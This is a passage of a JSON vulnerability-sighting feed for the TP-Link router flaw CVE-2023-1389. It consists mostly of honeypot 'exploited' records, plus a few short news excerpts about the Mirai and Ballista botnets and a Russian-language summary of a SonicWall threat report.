"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-14)", "content": "", "creation_timestamp": "2025-11-14T00:00:00.000000Z"}, {"uuid": "2b7aa3be-0389-40ca-9a3a-10d64315588c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-30)", "content": "", "creation_timestamp": "2025-11-30T00:00:00.000000Z"}, {"uuid": "b1b4f612-42fe-4ab6-ad66-9df71ebd6644", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-23)", "content": "", "creation_timestamp": "2025-11-23T00:00:00.000000Z"}, {"uuid": "9b3b7e95-1406-4484-84ab-7f896713aa02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-07)", "content": "", "creation_timestamp": "2026-03-07T00:00:00.000000Z"}, {"uuid": "7a9f2bb7-298f-4011-9e59-82c4df923fbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-05)", "content": "", "creation_timestamp": "2025-12-05T00:00:00.000000Z"}, {"uuid": "e8230408-0436-4c5b-87d7-a69bfb0cc255", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-03)", "content": "", "creation_timestamp": "2025-12-03T00:00:00.000000Z"}, {"uuid": "726ca259-3a37-4f94-bfff-f5add388e6b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-02)", "content": "", "creation_timestamp": "2025-12-02T00:00:00.000000Z"}, {"uuid": "ad0017ad-9a63-4745-97d5-c3295f6bf66e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-04)", "content": "", "creation_timestamp": "2025-12-04T00:00:00.000000Z"}, {"uuid": "f4c91c18-7b61-405a-b95e-8708874c47a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-13)", "content": "", "creation_timestamp": "2026-02-13T00:00:00.000000Z"}, {"uuid": "ef1f6581-3b59-48ba-ad7f-ad551661ce3b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-08)", "content": "", "creation_timestamp": "2025-12-08T00:00:00.000000Z"}, {"uuid": "e11696bb-41d7-4f39-9938-4d1c91b209d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-27)", "content": "", "creation_timestamp": "2026-02-27T00:00:00.000000Z"}, {"uuid": "bd07b623-3b97-42e4-a199-bfb7a4db2a83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-06)", "content": "", "creation_timestamp": "2025-12-06T00:00:00.000000Z"}, {"uuid": "b12844d1-3a8a-4caa-a369-6c1202726bac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-04)", "content": "", "creation_timestamp": "2026-03-04T00:00:00.000000Z"}, {"uuid": "a98c2874-7f4b-40c2-8796-782aea44638e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-07)", "content": "", "creation_timestamp": "2025-12-07T00:00:00.000000Z"}, {"uuid": "03cd72bb-85b8-4d06-a9e9-58c1fd7c44cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-07)", "content": "", "creation_timestamp": "2026-02-07T00:00:00.000000Z"}, {"uuid": "3bb32768-f7a6-493a-887b-bd27ae6aed96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-10)", "content": "", "creation_timestamp": "2025-12-10T00:00:00.000000Z"}, {"uuid": "fd6fe038-9e69-45b9-b6b8-302b2a39689f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-09)", "content": "", "creation_timestamp": "2025-12-09T00:00:00.000000Z"}, {"uuid": "d7a64b75-80b5-489b-9db1-ee3a20e152aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-10)", "content": "", "creation_timestamp": "2026-02-10T00:00:00.000000Z"}, {"uuid": "fabc113a-17f6-4298-b670-6c367b6bf098", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-23)", "content": "", "creation_timestamp": "2026-02-23T00:00:00.000000Z"}, {"uuid": "a2c273ed-9aff-4e9c-bc41-5e0ce327b798", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-15)", "content": "", "creation_timestamp": "2025-12-15T00:00:00.000000Z"}, {"uuid": "cfa9f753-d39f-4fa0-8459-fe98f90271dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-11)", "content": "", "creation_timestamp": "2025-12-11T00:00:00.000000Z"}, {"uuid": "b6912cf9-c378-45ac-9be6-eb978ea7d43b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-12)", "content": "", "creation_timestamp": "2025-12-12T00:00:00.000000Z"}, {"uuid": "5f9971a8-e2f7-4ff5-9136-e430677bacec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2025-12-11)", "content": "", "creation_timestamp": "2025-12-11T00:00:00.000000Z"}, {"uuid": "7850f010-2b01-4964-8af0-8d10480b93a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-13)", "content": "", "creation_timestamp": "2025-12-13T00:00:00.000000Z"}, {"uuid": "c6a6f7b7-1d08-4cf5-be7a-de71c6e7fd8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-14)", "content": "", "creation_timestamp": "2025-12-14T00:00:00.000000Z"}, {"uuid": "6dec4b39-d70e-4b55-b05f-3473bb011510", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-17)", "content": "", "creation_timestamp": "2025-12-17T00:00:00.000000Z"}, {"uuid": "f2b346a5-a933-47ed-930a-8e115b4f429b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-16)", "content": "", "creation_timestamp": "2025-12-16T00:00:00.000000Z"}, {"uuid": "4284972e-0eea-4823-b4eb-d5f3f1e6c823", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-21)", "content": "", "creation_timestamp": "2026-02-21T00:00:00.000000Z"}, {"uuid": "41ec292c-d8e2-4549-8715-d4bf069ca205", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-18)", "content": "", "creation_timestamp": "2025-12-18T00:00:00.000000Z"}, {"uuid": "8b2121c6-0949-4722-827d-77f6631a4cb1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-22)", "content": "", "creation_timestamp": "2025-12-22T00:00:00.000000Z"}, {"uuid": "960e8bd7-a76e-41e3-9f21-94f21725fe6f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-21)", "content": "", "creation_timestamp": "2025-12-21T00:00:00.000000Z"}, {"uuid": "8e3ac3c7-88f7-4da9-b886-b521470bdb62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-19)", "content": "", "creation_timestamp": "2025-12-19T00:00:00.000000Z"}, {"uuid": "c9b510e8-54a5-406e-98b2-a950ace795f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-20)", "content": "", "creation_timestamp": "2025-12-20T00:00:00.000000Z"}, {"uuid": "c06f39da-948e-4be6-991d-df50a59f8ae8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-01)", "content": "", "creation_timestamp": "2026-02-01T00:00:00.000000Z"}, {"uuid": "d8729543-85ea-48e9-beb2-7a504b1a6805", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-24)", "content": "", "creation_timestamp": "2025-12-24T00:00:00.000000Z"}, {"uuid": "a10cd4fb-de97-41a9-a009-3ef77acc6548", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-06)", "content": "", "creation_timestamp": "2026-02-06T00:00:00.000000Z"}, {"uuid": "f2b62152-1717-4883-96e5-3390802433a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-23)", "content": "", "creation_timestamp": "2025-12-23T00:00:00.000000Z"}, {"uuid": "11b6b92b-d4ab-4f24-9030-a9e4105671be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-30)", "content": "", "creation_timestamp": "2026-01-30T00:00:00.000000Z"}, {"uuid": "fee29ad8-7767-4907-8ea4-1a3f3dc98fa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-14)", "content": "", "creation_timestamp": "2026-02-14T00:00:00.000000Z"}, {"uuid": "e04f8e41-93e8-48df-88d7-55886d1fec4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-11)", "content": "", "creation_timestamp": "2026-02-11T00:00:00.000000Z"}, {"uuid": "14aa6a4a-c57f-4fb6-ad4c-6c8e5b7221e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-12-29)", "content": "", "creation_timestamp": "2025-12-29T00:00:00.000000Z"}, {"uuid": "9cc7803c-85ae-489d-9dde-b3d7b635524b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-19)", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "581d324e-d334-436d-ae5d-f5b90b0d5ad0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-06)", "content": "", "creation_timestamp": "2026-03-06T00:00:00.000000Z"}, {"uuid": "f7a54085-ea0d-47d9-9bb5-76386df460fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1018", "content": "", "creation_timestamp": "2023-04-26T04:00:00.000000Z"}, {"uuid": "0712720c-f0c3-4715-a2f1-5cc552ec2e05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-02-08)", "content": "", "creation_timestamp": "2026-02-08T00:00:00.000000Z"}, {"uuid": "afd3fbdb-42ee-4052-a040-cbbc1f049395", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-28)", "content": "", "creation_timestamp": "2026-01-28T00:00:00.000000Z"}, {"uuid": "5ee6b800-c0c2-4338-bacc-19607dfba313", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-05)", "content": "", "creation_timestamp": "2026-01-05T00:00:00.000000Z"}, {"uuid": "9de944e5-9c2a-4691-b500-3e6d3090b5a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-25)", "content": "", "creation_timestamp": "2026-03-25T00:00:00.000000Z"}, {"uuid": "f7e7e451-e358-4055-a232-3df4c2b3f80e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-10)", "content": "", "creation_timestamp": "2026-03-10T00:00:00.000000Z"}, {"uuid": "7e80a408-003c-4911-9405-7c64422128c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-13)", "content": "", "creation_timestamp": "2026-03-13T00:00:00.000000Z"}, {"uuid": "138665da-792b-4cc0-9f08-5dac6b71fc95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-01-14)", "content": "", "creation_timestamp": "2026-01-14T00:00:00.000000Z"}, {"uuid": "e80aabd6-f44c-458b-92a1-4a39e20af51a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-27)", "content": "", "creation_timestamp": "2026-04-27T00:00:00.000000Z"}, {"uuid": "e3202499-b2af-4b7e-8016-de457391bba8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-03-15)", "content": "", "creation_timestamp": "2026-03-15T00:00:00.000000Z"}, {"uuid": "2f9ed37b-fe4f-466c-8191-0051c66673ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/dd2724a3-2b91-4945-b347-63624e8875d8", "content": "", "creation_timestamp": "2026-02-02T12:27:00.067005Z"}, {"uuid": "eed3898c-f828-4820-879f-af0756687131", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-01)", "content": "", "creation_timestamp": "2026-04-01T00:00:00.000000Z"}, {"uuid": "d800bf6c-4cd2-4da7-a48b-610f23dc2ea7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/BleepingComputer/16373", "content": "Latest news and stories from BleepingComputer.com\nTP-Link Archer WiFi router flaw exploited by Mirai malware\n\nThe Mirai malware botnet is actively exploiting a TP-Link Archer A21 (AX1800) WiFi router vulnerability tracked as CVE-2023-1389 to incorporate devices into DDoS (distributed denial of service) swarms. [...]", "creation_timestamp": "2023-04-25T15:35:59.000000Z"}, {"uuid": "0f8dd41a-da81-42bc-98fc-e7e8be48e73b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "exploited", "source": "https://t.me/claytechsolution/211", "content": "The Hacker News\nBallista Botnet Exploits Unpatched TP-Link Vulnerability, Infects Over 6,000 Devices\n\nUnpatched TP-Link Archer routers have become the target of a new botnet campaign dubbed Ballista, according to new findings from the Cato CTRL team.\n\"The botnet exploits a remote code execution (RCE) vulnerability in TP-Link Archer routers (CVE-2023-1389) to spread itself automatically over the Internet,\" security researchers Ofek Vardi and Matan Mittelman said in a technical report shared with", "creation_timestamp": "2025-03-11T16:31:56.000000Z"}, {"uuid": "555272cb-470f-4396-8938-78a529419a9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-1389", "type": "seen", "source": "https://t.me/itsec_news/4567", "content": "\u200b\u26a1\ufe0f\u0412\u0437\u0440\u044b\u0432\u043d\u043e\u0439 \u0440\u043e\u0441\u0442 IoT-\u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043e\u0432 \u0438 \u0442\u0451\u043c\u043d\u0430\u044f \u0441\u0442\u043e\u0440\u043e\u043d\u0430 PowerShell: \u0441\u0432\u0435\u0436\u0438\u0439 \u043e\u0442\u0447\u0451\u0442 SonicWall\n\n\ud83d\udcac\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f SonicWall \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u043b\u0443\u0433\u043e\u0434\u043e\u0432\u043e\u0439 \u043e\u0442\u0447\u0451\u0442 \u043e \u043a\u0438\u0431\u0435\u0440\u0443\u0433\u0440\u043e\u0437\u0430\u0445 \u0437\u0430 2024 \u0433\u043e\u0434. \u0412 \u043f\u0435\u0440\u0432\u043e\u0439 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0435 \u0433\u043e\u0434\u0430 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0432\u043e\u0437\u0440\u043e\u0441\u043b\u0438 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0446\u0435\u043f\u043e\u0447\u043a\u0443 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a, \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u043b\u043e\u0441\u044c \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u0430 \u0432\u0435\u0449\u0435\u0439 (IoT), \u0430 \u0442\u0430\u043a\u0436\u0435 \u0443\u0441\u0438\u043b\u0438\u043b\u043e\u0441\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 PowerShell \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438. \u041e\u0442\u0447\u0451\u0442 \u043e\u0441\u043d\u043e\u0432\u0430\u043d \u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0445, \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0445 \u0437\u0430 \u044d\u0442\u043e\u0442 \u043f\u0435\u0440\u0438\u043e\u0434, \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043b\u0443\u0447\u0448\u0435 \u043f\u043e\u043d\u044f\u0442\u044c \u0442\u0435\u043a\u0443\u0449\u0438\u0435 \u0443\u0433\u0440\u043e\u0437\u044b \u0438 \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u0438 \u0432 \u0438\u043d\u0434\u0443\u0441\u0442\u0440\u0438\u0438.\n\n\u041e\u0434\u043d\u0438\u043c \u0438\u0437 \u043a\u043b\u044e\u0447\u0435\u0432\u044b\u0445 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439 \u0441\u0442\u0430\u043b\u043e \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u0435 \u043d\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438\u0437\u043c\u0435\u0440\u0435\u043d\u0438\u044f \u0443\u0433\u0440\u043e\u0437 \u2014 TICKS. \u0412\u043c\u0435\u0441\u0442\u043e \u043f\u043e\u0434\u0441\u0447\u0451\u0442\u0430 \u043a\u0430\u0436\u0434\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u043f\u043e \u0444\u0430\u0439\u0435\u0440\u0432\u043e\u043b\u0443, \u043a\u0430\u043a \u044d\u0442\u043e \u0434\u0435\u043b\u0430\u043b\u043e\u0441\u044c \u0440\u0430\u043d\u0435\u0435 (HITS), \u0442\u0435\u043f\u0435\u0440\u044c \u0438\u0437\u043c\u0435\u0440\u044f\u0435\u0442\u0441\u044f \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0447\u0430\u0441\u043e\u0432, \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0444\u0430\u0439\u0435\u0440\u0432\u043e\u043b \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u0435\u0442\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u043c\u0443 \u0432\u043e\u0437\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044e. \u042d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0431\u043e\u043b\u0435\u0435 \u0442\u043e\u0447\u043d\u0443\u044e \u043a\u0430\u0440\u0442\u0438\u043d\u0443 \u0438 \u0443\u043f\u0440\u043e\u0449\u0430\u0435\u0442 \u0430\u043d\u0430\u043b\u0438\u0437 \u0434\u0430\u043d\u043d\u044b\u0445.\n\n\u0410\u0442\u0430\u043a\u0438 \u043d\u0430 \u0431\u0438\u0437\u043d\u0435\u0441-\u043f\u043e\u0447\u0442\u0443 (BEC) \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0443\u0432\u0435\u043b\u0438\u0447\u0438\u043b\u0438\u0441\u044c. \u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c SonicWall, \u043d\u0430 \u043a\u0430\u0436\u0434\u0443\u044e \u0430\u0442\u0430\u043a\u0443 \u0441 